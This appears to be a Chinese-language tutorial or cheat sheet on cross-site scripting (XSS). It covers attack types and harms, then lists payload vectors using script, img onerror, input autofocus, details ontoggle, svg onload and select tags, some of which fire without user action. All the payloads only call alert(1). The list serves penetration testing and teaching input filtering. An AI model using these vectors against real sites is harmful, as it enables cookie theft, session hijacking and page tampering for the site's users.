XSS的攻击方式
♾️ haml 代码:
反射型XSS
存储型XSS
DOM型XSS
XSS的危害
♾️ haml 代码:1.挂马
2.盗取用户Cookie。
3.DOS(拒绝服务)客户端浏览器。
4.钓鱼攻击,高级的钓鱼技巧。
5.删除目标文章、恶意篡改数据、嫁祸。
6.劫持用户Web行为,甚至进一步渗透内网。
7.爆发Web2.0蠕虫。
8.蠕虫式的DDoS攻击。
9.蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据
10.其它安全问题
1.scrpit标签
♾️ haml 代码:<script> 标签用于定义客户端脚本,比如 JavaScript。
♾️ haml 代码:<script>alert(1);</script>
<script>alert("xss");</script>
2.img 标签
♾️ haml 代码:<img> 标签定义 HTML 页面中的图像。
♾️ haml 代码:<img src=1 onerror=alert(1);>
<img src=1 onerror=alert("xss");>
3.input 标签
♾️ haml 代码:<input> 标签规定了用户可以在其中输入数据的输入字段。
♾️ haml 代码:onfocus 事件在对象获得焦点时发生:
<input onfocus=alert(1);>
竞争焦点,从而触发onblur事件:
♾️ haml 代码:<input onblur=alert(1) autofocus><input autofocus>
input 标签的 autofocus 属性规定当页面加载时 元素应该自动获得焦点。可以通过autofocus属性自动执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发:
♾️ haml 代码:<input onfocus="alert(1);" autofocus>
♾️ haml 代码:" οnclick=alert(1)> 这样需要点击一下输入框<br>
" onmouseover=alert(1)> 需要鼠标划过输入框<br>
4.details 标签
♾️ haml 代码:<details> 标签通过提供用户开启关闭的交互式控件,规定了用户可见的或者隐藏的需求的补充细节。ontoggle 事件规定了在用户打开或关闭 <details> 元素时触发:
<details ontoggle=alert(1);>
使用details 标签的 open 属性触发ontoggle事件,无需用户去点击即可触发:
♾️ haml 代码:<details open ontoggle=alert(1);>
5.svg 标签
♾️ haml 代码:<svg> 标签用来在HTML页面中直接嵌入SVG 文件的代码。
<svg onload=alert(1);>
6.select 标签
♾️ haml 代码:<select> 标签用来创建下拉列表。
<select onfocus=alert(1)></select
通过autofocus属性规定当页面加载时元素应该自动获得焦点,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发:
<select onfocus=alert(1) autofocus>